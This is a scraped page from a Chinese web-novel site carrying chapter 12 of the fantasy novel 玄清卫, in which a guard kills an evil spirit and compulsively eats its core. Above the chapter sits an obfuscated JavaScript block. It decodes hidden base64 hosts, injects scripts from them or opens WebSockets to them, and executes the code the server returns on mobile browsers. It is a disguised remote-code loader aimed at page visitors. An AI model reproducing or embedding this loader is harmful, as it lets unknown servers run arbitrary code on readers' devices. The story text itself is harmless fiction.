笔趣阁

字:
关灯 护眼
笔趣阁 > 玄清卫 > 第12章 吃了
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第12章 吃了

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
沈浩连退数步,身前道道爪影翻飞,不但轻易撕开他布下的真元护盾更无视他身上的锦袍法器,眨眼便在他的左肩和右肋处留下了六条撕裂伤。
  这还是沈浩靠着出色的临场反应和手中雁脊刀格挡掉大部分致命攻击的结果,反应稍微慢半拍他都身死当场了。
  情况非常不妙。
  以沈浩的经验,就算不用追邪盘他也敢肯定眼前这只袭击他的黑影就是一头三品邪祟。
  云雾状,高丈许,漆黑如墨,伸出三只利爪状肢体,速度极快,一双血红的眼睛更添狰狞。
  “砰!”
  再一刀勉强斩开一道爪击之后巨大的反震力道让沈浩的内府再也受不住了,一口血从口鼻渗出,整个身体也被反向抛飞,重重的撞在一根柱子上。
  第一次面对三品邪祟,沈浩如今的炼气六重修为就跟一个半大孩子一般,毫无还手之力。
  不过沈浩也借此机会拉开了一点距离,趁机从怀里掏出两张符箓。
  一张御雷符,一张引援符。
  鼓荡真元,两张符箓同时被激活。
  御雷符迎敌,引援符求救。
  “噼里啪啦!”
  符箓被激活的瞬间,一道儿臂粗细的雷霆凭空出现,精准的劈在沈浩身前的那头邪祟身上。
  “嘶!”
  一声嘶痛从邪祟口中鸣响,同时它身上多了一个碗口粗细的贯穿伤口,即便是雾团状的主体也无法愈合这种伤势,这是刚才那道雷霆造成的。
  雷法阳极,对邪祟这种阴邪玩意儿有着成倍的伤害效果。
  另外一道引援符也升上高空,不单有玄字光影四射发出求援讯号,还有浓烈的的特殊法力波动四散开去,几个呼吸间就能传出去数十里。
  “可惜了!”
  一道御雷符给面前的邪祟开了一个天窗,绝对的重伤,但并没有将其直接劈死,沈浩心里叹了口气。
  心里觉得可惜但手上却是不停,从怀里将最后一张御雷符掏了出来,毫不犹豫的再次打了出去。
  一如刚才的那道霹雳,而且即便是那邪祟明显想跑也完全来不及了。
  就见咔嚓一声,第二次被开天窗的邪祟再也扛不住了,凄厉的一声惨叫之后身体便开始崩散,一缕缕肉眼可见的戾气从它的身体里抽丝剥茧一样飘出来最后没入地下,很快就只剩下一颗核桃大小的珠子。
  “这是邪核?!”
  妖产妖丹,邪祟孕育邪核,道理类似于蚌珠。只不过比起蚌珠,妖丹和邪核就更加罕见得多了。
  沈浩在玄清卫混了八年,手刃的邪祟不下五十,但却是第一次见着邪核。
  还没来得及做它想,一股不可名状却又猛烈无比的饥饿感突然冒了出来,更让沈浩措手不及的是他居然本能的盯着那颗邪核止不住的咽着口水。
  “这什么情况?!为什么老子想要吃那玩意儿?!”
  心里知道不妙可这股饥饿感却无法抵抗,沈浩颤着手一把将邪核抓住然后直接就扔进了嘴里。
  一瞬间,沈浩欲哭无泪的想起了以前听到过的一句话:我也不想吃啊,可是我的手和嘴它们有自己的想法。
  心里一阵泛恶心,可嘴巴却嚼得很起劲,甚至他还觉得这玩意儿吃起来很像咸味儿的巧克力!?
  下一秒沈浩心头一颤,他记得玄清卫里《邪祟本纪》中的开篇之言是:邪核乃戾气之核心,阴邪之极,有腐毒,食之必死无疑。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师